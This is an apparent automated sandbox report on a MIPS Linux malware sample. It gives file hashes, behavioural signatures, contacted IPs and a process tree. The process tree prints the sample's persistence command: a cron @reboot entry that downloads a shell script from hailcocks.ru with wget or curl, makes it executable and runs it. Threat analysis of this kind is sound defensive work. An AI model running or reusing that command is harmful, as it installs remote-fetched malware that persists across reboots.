Analysis
- max time kernel: 143s
- max time network: 140s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 27-10-2024 02:24
Static task: static1
Behavioral task: behavioral1
- Sample: 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
- Resource: debian9-mipsbe-20240611-en
General
- Target: 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
- Size: 99KB
- MD5: 36e86bb02185647aa672a226e7fe224f
- SHA1: 66de8267b6fbef3423a21ed56e1fd68265882666
- SHA256: 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb
- SHA512: 011ca601c3481c0ef30b4f3481e88dd05e329f1e129229cf5921e6ebf5b78806d6c8568a25ad0dd62cfd790e97fbf3d74efc047a457245647ebc939814c88cf0
- SSDEEP: 1536:F6KyNOhiWfjZsF1LtLGgZRSKRSaySRUUkvjMS1BEYoiueZ9DWK+FSn+:fzh1slGgCvjMS1KdC+w+
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 1 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
- Renames itself (1 IoCs)
  Processes: pid 709, process 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
- Unexpected DNS network traffic destination (2 IoCs)
  Network traffic to servers other than the configured DNS servers was detected on the DNS port.
  IoCs: Destination IP 70.34.254.19; Destination IP 185.181.61.24
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  IoC: File opened for modification /var/spool/cron/crontabs/tmp.dQCYhx (process: crontab)
- Changes its process name (1 IoCs)
  IoC: Changes the process name, possibly in an attempt to hide itself, to "/bin/sh /etc/init.d/rcS" (pid 709, process 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf)
- Reads runtime system information
  IoCs: File opened for reading /proc/filesystems (process: crontab); File opened for reading /proc/filesystems (process: crontab); File opened for reading /proc/mounts (process: 5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf)
Processes
- [1] /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
  command line: /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
  - Renames itself
  - Changes its process name
  - Reads runtime system information
  PID: 709
  - [2] /bin/sh
    command line: sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    - File and Directory Permissions Modification
    PID: 711
    - [3] /usr/bin/crontab
      command line: crontab -
      - Creates/modifies Cron job
      - Reads runtime system information
      PID: 713
    - [3] /usr/bin/crontab
      command line: crontab -l
      - Reads runtime system information
      PID: 714
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 306B
  MD5: f3ce9d7a4a91e5fd83d71554c65e28dd
  SHA1: 92f5357290d7c8b4d7f31552e22f6c0c7b2c1248
  SHA256: 31a0a02ee271e3d7233ac8ae401cb0b9c0561f6604e18077d4a1d5892616e1cf
  SHA512: 11e5be7af45d81b7aec59b576cb46621f9c9d290cd8b2e619c777400ae8a2d9452d0c0e97662f5043e1d6622292100f3f20e69b747eb829288211544f597e2b0